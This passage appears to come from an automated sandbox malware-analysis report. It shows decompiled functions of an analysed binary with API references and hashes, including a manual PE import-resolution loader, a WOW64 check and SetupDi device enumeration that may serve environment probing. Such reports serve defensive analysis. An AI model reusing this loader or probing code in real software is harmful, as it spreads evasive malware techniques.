				return 0;
			}

0x1001af10
0x1001af10
0x1001af19
0x1001af1f
0x1001af22
0x1001af25
0x1001af34
0x1001af3e
0x1001af57
0x1001af61
0x1001af6e
0x00000000
0x1001af7b
0x1001af86
0x1001afca
0x1001afe7
0x1001b0a9
0x1001b0ba
0x1001b0ca
0x1001b0d1
0x1001b0e6
0x1001b0e9
0x1001b0f2
0x00000000
0x1001b112
0x1001b0f6
0x00000000
0x1001b0fc
0x1001b0d5
0x00000000
0x1001b0db
0x1001aff6
0x1001b002
0x1001b00f
0x1001b014
0x1001b017
0x1001b020
0x1001b027
0x1001b038
0x1001b065
0x1001b07b
0x1001b086
0x1001b047
0x1001b050
0x1001b059
0x1001b062
0x1001b062
0x1001b09d
0x1001b0a1
0x1001b0a6
0x00000000
0x1001b0a6
0x1001b02b
0x00000000
0x1001b031
0x1001afce
0x00000000
0x1001afd4
0x1001af99
0x1001afbb
0x00000000
0x1001afbb
0x1001af9d
0x00000000
0x1001afa3
0x1001af61
0x1001af42
0x00000000

APIs

SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF42
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF6E

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
Instruction ID: 27e70c85a8907a9ba83dd9d1e295feb5005e929d9b7098f35adbadc5d796aaa6
Opcode Fuzzy Hash: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
Instruction Fuzzy Hash: 3371C374A00109EFDB08CF98C995AAEB7F1FF49304F618599E915AB345D734EA81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401070, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401070() {
				char _v4;
				signed int _v12;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				void* _t5;
				signed int _t6;
				_Unknown_base(*)()* _t11;

				_t3 = GetModuleHandleA("Kernel32.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "IsWow64Process");
					_t11 = _t4;
					if(_t11 != 0) {
						_t5 = GetCurrentProcess();
						if(_t5 != 0) {
							_t6 =  *_t11(_t5,  &_v4);
							asm("sbb eax, eax");
							return  ~_t6 & _v12;
						} else {
							return _t5;
						}
					} else {
						return _t4;
					}
				} else {
					return _t3;
				}
			}

0x00401077
0x0040107f
0x0040108a
0x00401090
0x00401094
0x00401099
0x004010a1
0x004010ac
0x004010b5
0x004010ba
0x004010a5
0x004010a5
0x004010a5
0x00401098
0x00401098
0x00401098
0x00401083
0x00401083
0x00401083

APIs

GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00401077
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040108A

Strings

IsWow64Process, xrefs: 00401084
Kernel32.dll, xrefs: 00401072

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$Kernel32.dll
API String ID: 1646373207-2893920747
Opcode ID: de38f9ad0efdbed7fc00bdec0d918f1e73f141aa4d7654630022051159688da3
Instruction ID: 0f79affc76f9381138ebf103281d235305e31b8f574dc99244aa29f60611ee23
Opcode Fuzzy Hash: de38f9ad0efdbed7fc00bdec0d918f1e73f141aa4d7654630022051159688da3
Instruction Fuzzy Hash: EEE09BB36512216FD62417B8BC09EE76798DD90B63324453FF543E65D0EF3CD8405698

Uniqueness

Uniqueness Score: -1.00%

Function 100118DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E100118DF(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10334594);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10334590);
					_t11 =  *(TlsGetValue( *0x10334594))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10334590);
				 *((intOrPtr*)(E1001158A( *0x10335480)))();
				_push(_t11);
				L100117AC(_t9, _t11, _t15, _t16);
				_t5 =  *0x10334594; // 0x1d
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}

0x100118df
0x100118ec
0x100118ee
0x100118f0
0x100118f2
0x10011902
0x10011902
0x10011904
0x10011905
0x10011907
0x10011919
0x1001191b
0x1001191c
0x10011922
0x1001192a
0x00000000
0x1001192f
0x10011935

APIs

TlsGetValue.KERNEL32 ref: 100118EC
TlsGetValue.KERNEL32 ref: 100118FE
__decode_pointer.LIBCMT ref: 10011913
TlsSetValue.KERNEL32(0000001D,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331640,0000000C,1000EC47), ref: 1001192F

Strings

tj, xrefs: 1001192A

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$__decode_pointer
String ID: tj
API String ID: 3389472636-3491506833
Opcode ID: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
Instruction ID: 5ea32f06f5c113a557663da0afc6a555ab05ec8127c22f0ad06d45371975ea5c
Opcode Fuzzy Hash: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
Instruction Fuzzy Hash: 25E06D3A800120AFFA059B759CC4B693F6AFBCA661F110111F12CDE0B2DE31ECA29A00

Uniqueness

Uniqueness Score: -1.00%

Function 100199C0, Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E100199C0(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E100031F0( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E1002314A, 0xffffffff);
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF80(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF80(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380);
						_t85 = E100197E0(_t116, _t182);
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D1F0(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380);
						_t88 = E100197E0(_t116, _t183);
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D1F0(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380);
						_t91 = E100197E0(_t116, _t184);
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D1F0(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380);
						_t94 = E100197E0(_t116, _t185);
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D1F0(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380);
						_t97 = E100197E0(_t116, _t186);
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D1F0(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003390( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380);
				}
				E10003220(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003300( &_v1368);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x100199c0
0x100199d1
0x100199d8
0x100199e0
0x100199f0
0x100199f5
0x100199fc
0x10019a06
0x10019a0d
0x10019a1f
0x10019a25
0x10019a32
0x10019a40
0x10019a45
0x10019a48
0x10019a4f
0x10019a53
0x10019a5a
0x10019a61
0x10019a69
0x00000000
0x00000000
0x10019a7d
0x10019a8b
0x10019a8f
0x10019a90
0x10019a92
0x10019a9a
0x10019a9f
0x10019a9f
0x10019aa7
0x10019aa8
0x10019aad
0x10019ab0
0x10019ab2
0x10019ac6
0x10019ad1
0x10019ad2
0x10019ad7
0x10019ad7
0x10019ae0
0x10019ae4
0x10019ae5
0x10019ae7
0x10019aef
0x10019af4
0x10019af4
0x10019afc
0x10019afd
0x10019b02
0x10019b05
0x10019b07
0x10019b1b
0x10019b26
0x10019b27
0x10019b2c
0x10019b2c
0x10019b35
0x10019b39
0x10019b3a
0x10019b3c
0x10019b44
0x10019b49
0x10019b49
0x10019b51
0x10019b52
0x10019b57
0x10019b5a
0x10019b5c
0x10019b70
0x10019b7b
0x10019b7c
0x10019b81
0x10019b81
0x10019b8a
0x10019b8e
0x10019b8f
0x10019b91
0x10019b99
0x10019b9e
0x10019b9e
0x10019ba6
0x10019ba7
0x10019bac
0x10019baf
0x10019bb1
0x10019bc5
0x10019bd0
0x10019bd1
0x10019bd6
0x10019bd6
0x10019bdf
0x10019be3
0x10019be4
0x10019be6
0x10019bee
0x10019bf3
0x10019bf3
0x10019bfb
0x10019bfc
0x10019c01
0x10019c04
0x10019c06
0x10019c1a
0x10019c25
0x10019c26
0x10019c2b
0x10019c2b
0x10019c37
0x10019c4a
0x10019c4a
0x10019c5b
0x10019c5b
0x10019c6b
0x10019c76
0x10019c76
0x10019c79
0x10019c7f
0x10019c8c
0x10019c97
0x10019ca3

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 10019A1F
_memset.LIBCMT ref: 10019A40
SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A61
_memset.LIBCMT ref: 10019A7D

Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
Part of subcall function 100197E0: GetLastError.KERNEL32 ref: 10019812
Part of subcall function 100197E0: _memset.LIBCMT ref: 1001983E
Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019C5B

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
String ID:
API String ID: 3323326763-0
Opcode ID: be00d84646f1b510e2cc436dbf2af7cf9ed6e47a91e4a853b8a6da5aaf38a255
Instruction ID: feca0670d641fe6b0cb65ea07884cbe10e98eaee29bba7d3bd3bbacfe8845874
Opcode Fuzzy Hash: be00d84646f1b510e2cc436dbf2af7cf9ed6e47a91e4a853b8a6da5aaf38a255
Instruction Fuzzy Hash: 6C81A5B6D006189BDB14DBA8DC51FEF7378EB48315F048198E509B7281EB35AA85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001ABC0, Relevance: 7.7, APIs: 5, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001ABC0(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18);
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E078(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

0x1001abc9
0x1001abcc
0x1001abcf
0x1001abe0
0x1001abea
0x1001abfe
0x1001ac0c
0x1001ac12
0x1001ac18
0x1001ac1a
0x00000000
0x00000000
0x1001ac20
0x1001ac23
0x1001ac27
0x00000000
0x00000000
0x1001ac30
0x1001ac41
0x1001ac44
0x1001ac46
0x1001ac49
0x1001ac4c
0x1001ac50
0x1001ac69
0x1001ac73
0x1001ac77
0x1001ac7a
0x1001ac7b
0x1001ac80
0x1001ac83
0x1001ac86
0x1001ac8a
0x1001acbc
0x1001acc2
0x1001acc8
0x1001acce
0x1001acd4
0x1001acdd
0x1001ace3
0x1001ace6
0x1001ad0a
0x1001ad13
0x1001ad13
0x1001ad16
0x1001ace8
0x1001acf0
0x1001acfc
0x1001acfc
0x1001ad2d
0x1001ad30
0x1001ad33
0x00000000
0x00000000
0x1001ad3a
0x1001ad40
0x1001ad72
0x1001ad78
0x1001ad7f
0x1001ad7f
0x1001ad8a
0x1001ad8d
0x1001ad8f
0x1001ad95
0x1001ad42
0x1001ad45
0x1001ad5b
0x1001ad5e
0x1001ad60
0x1001ad66
0x1001ad66
0x1001ad9a
0x1001ad9d
0x1001ad21
0x1001ad27
0x1001ad27
0x1001ad2a
0x00000000
0x1001ad9f
0x1001ad9f
0x00000000
0x1001ad9f
0x1001ad9d
0x1001adad
0x1001adb1
0x1001ac06
0x1001ac06
0x1001ac09
0x00000000
0x1001ac09
0x1001adb6
0x1001adc1
0x1001adc4
0x1001adcb
0x00000000
0x1001adcb
0x1001ac8f
0x1001ac9a
0x1001ac9d
0x1001aca4
0x1001acaa
0x00000000
0x1001acaa
0x1001ac54
0x1001ac5a
0x00000000
0x1001ac5a
0x00000000
0x1001add8
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
SetLastError.KERNEL32(0000007E), ref: 1001AC54

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
Instruction ID: 7fa1d4eba7a4407511cddb994e7de49554f5151831751da13495a7fdaa87bcf2
Opcode Fuzzy Hash: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
Instruction Fuzzy Hash: 8B81A374A00209EFDB04CF94D981AAEB7F1FF89355F248158E919AB351C735EA82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0040699D, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040699D(void* __ecx, void* __edx) {
				void** _v8;
				struct _STARTUPINFOA _v76;
				void* __esi;
				void* __ebp;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int* _t59;
				signed char _t63;
				void** _t67;
				signed int* _t69;
				signed int _t72;
				int* _t73;
				signed int* _t75;
				signed int* _t76;
				void* _t77;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				signed int** _t92;

				_t89 = E00403A89(__ecx, 0x480);
				_pop(_t75);
				if(_t89 == 0) {
					E00403CCB(_t75, __edx, _t89);
					_t75 = 0x1b;
				}
				 *0x411d60 = _t89;
				 *0x411e60 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t89 =  &(_t89[9]);
					_t48 =  &(( *0x411d60)[0x120]);
				}
				GetStartupInfoA( &_v76);
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					do {
						_t76 =  *0x411d60;
						_t50 = _t72 + _t72 * 8;
						_t90 =  &(_t76[_t50]);
						if(_t76[_t50] != 0xffffffff) {
							_t90[1] = _t90[1] | 0x00000080;
							goto L37;
						}
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							if(_t58 != 2) {
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
					} while (_t72 < 3);
					return SetHandleCount( *0x411e60);
				}
				_t59 = _v76.lpReserved2;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 =  &(_t59[1]);
				_v8 = _t73 + _t88;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				if( *0x411e60 >= _t88) {
					L18:
					_t91 = 0;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t77 =  *_v8;
						if(_t77 != 0xffffffff) {
							_t63 =  *_t73;
							if((_t63 & 0x00000001) != 0 && ((_t63 & 0x00000008) != 0 || GetFileType(_t77) != 0)) {
								_t67 =  &(0x411d60[_t91 >> 5][(_t91 & 0x0000001f) + (_t91 & 0x0000001f) * 8]);
								 *_t67 =  *_v8;
								_t67[1] =  *_t73;
							}
						}
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 =  &(_t73[0]);
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x411d64;
					while(1) {
						_t69 = E00403A89(_t75, 0x480);
						if(_t69 == 0) {
							break;
						}
						 *0x411e60 =  *0x411e60 + 0x20;
						 *_t92 = _t69;
						_t13 =  &(_t69[0x120]); // 0x480
						_t75 = _t13;
						while(_t69 < _t75) {
							_t69[1] = _t69[1] & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							_t69[2] = _t69[2] & 0x00000000;
							_t69[1] = 0xa;
							_t69 =  &(_t69[9]);
							_t75 =  &(( *_t92)[0x120]);
						}
						_t92 =  &(_t92[1]);
						if( *0x411e60 < _t88) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x411e60;
					goto L18;
				}
			}

0x004069b0
0x004069b2
0x004069b5
0x004069b9
0x004069be
0x004069be
0x004069bf
0x004069c5
0x004069cf
0x004069cf
0x004069d5
0x004069d9
0x004069dd
0x004069e0
0x004069e4
0x004069ed
0x004069f0
0x004069f0
0x004069fb
0x00406a06
0x00406add
0x00406add
0x00406adf
0x00406adf
0x00406ae5
0x00406aec
0x00406aef
0x00406b3e
0x00000000
0x00406b3e
0x00406af3
0x00406af7
0x00406b03
0x00406b05
0x00406af9
0x00406afb
0x00406afb
0x00406b0f
0x00406b14
0x00406b2d
0x00406b2d
0x00406b16
0x00406b17
0x00406b1f
0x00000000
0x00000000
0x00406b21
0x00406b26
0x00406b2b
0x00406b36
0x00406b38
0x00406b38
0x00000000
0x00406b36
0x00000000
0x00406b2b
0x00406b42
0x00406b42
0x00406b43
0x00406b58
0x00406b58
0x00406a0c
0x00406a11
0x00000000
0x00000000
0x00406a17
0x00406a19
0x00406a1f
0x00406a29
0x00406a2b
0x00406a2b
0x00406a33
0x00406a8b
0x00406a8b
0x00406a8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a91
0x00406a91
0x00406a94
0x00406a99
0x00406a9b
0x00406a9f
0x00406ac4
0x00406acc
0x00406ad0
0x00406ad0
0x00406a9f
0x00406ad3
0x00406ad7
0x00406ad8
0x00406ad9
0x00000000
0x00406a35
0x00406a35
0x00406a3a
0x00406a3f
0x00406a47
0x00000000
0x00000000
0x00406a49
0x00406a50
0x00406a52
0x00406a52
0x00406a58
0x00406a5c
0x00406a60
0x00406a63
0x00406a67
0x00406a6d
0x00406a70
0x00406a70
0x00406a78
0x00406a81
0x00000000
0x00000000
0x00000000
0x00406a83
0x00406a85
0x00000000
0x00406a85

APIs

GetStartupInfoA.KERNEL32(?), ref: 004069FB
GetFileType.KERNEL32 ref: 00406AA6
GetStdHandle.KERNEL32(-000000F6), ref: 00406B09
GetFileType.KERNEL32(00000000), ref: 00406B17
SetHandleCount.KERNEL32 ref: 00406B4E

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
